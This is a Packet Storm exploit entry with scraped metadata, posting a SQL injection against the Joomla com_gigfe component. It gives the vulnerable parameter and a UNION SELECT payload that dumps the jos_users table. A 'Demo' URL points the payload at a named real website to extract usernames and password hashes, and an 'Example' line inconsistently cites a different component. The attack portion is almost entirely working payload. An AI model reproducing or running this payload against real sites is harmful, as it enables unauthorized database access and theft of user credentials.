ID PACKETSTORM:87144
Type packetstorm
Reporter DevilZ TM
Modified 2010-03-12T00:00:00
Description
`# Title : Joomla Component com_gigfe Remote SQL Injection
# Author: DevilZ TM
# Data : 2010-03-14
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_gigfe Remote SQL Injection
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File :
http://127.0.0.1/index.php?option=com_gigfe&task=style&styletype=[SQL]
[~] ExploiT :
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
[~] Example :
http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
[~] Demo :
http://www.centraljerseydance.org/index.php?option=com_gigfe&task=style&styletype=-1/**/UNION/**/SELECT/**/1,concat(username,0xa,password),3,4,5,6,7,8/**/FROM/**/jos_users/*
[~]######################################### ThankS To ... ############################################[~]
[~] Special Thanks To My Best FriendS :
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[~] IRANIAN Young HackerZ
[~]######################################## FinisH :D #################################################[~]
`
{"type": "packetstorm", "published": "2010-03-12T00:00:00", "reporter": "DevilZ TM", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "0584c973a798bfd5009d975d323e734e"}, {"key": "modified", "hash": "8b2279cc87cd5a74133102cd8a5a8003"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8b2279cc87cd5a74133102cd8a5a8003"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "dde70ef2217077c94df7ba19263efc96"}, {"key": "sourceData", "hash": "9b93fde4a10b91dc3af8b07642077228"}, {"key": "sourceHref", "hash": "8d69a5a1d2113c617df27d1f8d230b21"}, {"key": "title", "hash": "6cdf492d3c5c0b3c11995aa05fee6589"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`# Title : Joomla Component com_gigfe Remote SQL Injection \n# Author: DevilZ TM \n# Data : 2010-03-14 \n \n[~]######################################### InformatioN #############################################[~] \n \n[~] Title : Joomla Component com_gigfe Remote SQL Injection \n[~] Author : DevilZ TM By D3v1l \n[~] Homepage : http://www.DEVILZTM.com \n[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com \n \n[~]######################################### ExploiT #################################################[~] \n \n[~] Vulnerable File : \n \nhttp://127.0.0.1/index.php?option=com_gigfe&task=style&styletype=[SQL] \n \n[~] ExploiT : \n \n-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/* \n \n[~] Example : \n \nhttp://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/* \n \n[~] Demo : \n \nhttp://www.centraljerseydance.org/index.php?option=com_gigfe&task=style&styletype=-1/**/UNION/**/SELECT/**/1,concat(username,0xa,password),3,4,5,6,7,8/**/FROM/**/jos_users/* \n \n \n[~]######################################### ThankS To ... ############################################[~] \n \n[~] Special Thanks To My Best FriendS : \n \nExim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS \n \n[~] IRANIAN Young HackerZ \n \n[~]######################################## FinisH :D #################################################[~] \n \n`\n", "viewCount": 2, "history": [], "lastseen": "2016-11-03T10:21:17", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/87144/Joomla-Gigfe-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/87144/joomlagigfe-sql.txt", "title": "Joomla Gigfe SQL Injection", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:21:17"}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:17"}, "vulnersScore": 0.4}, "references": [], "id": "PACKETSTORM:87144", "hash": "8a3ce54f472e0b055924fe60199b2b6c8de20580f9acaa66c0fa8f2d031ce5ef", "edition": 1, "cvelist": [], "modified": "2010-03-12T00:00:00", "description": ""}
{}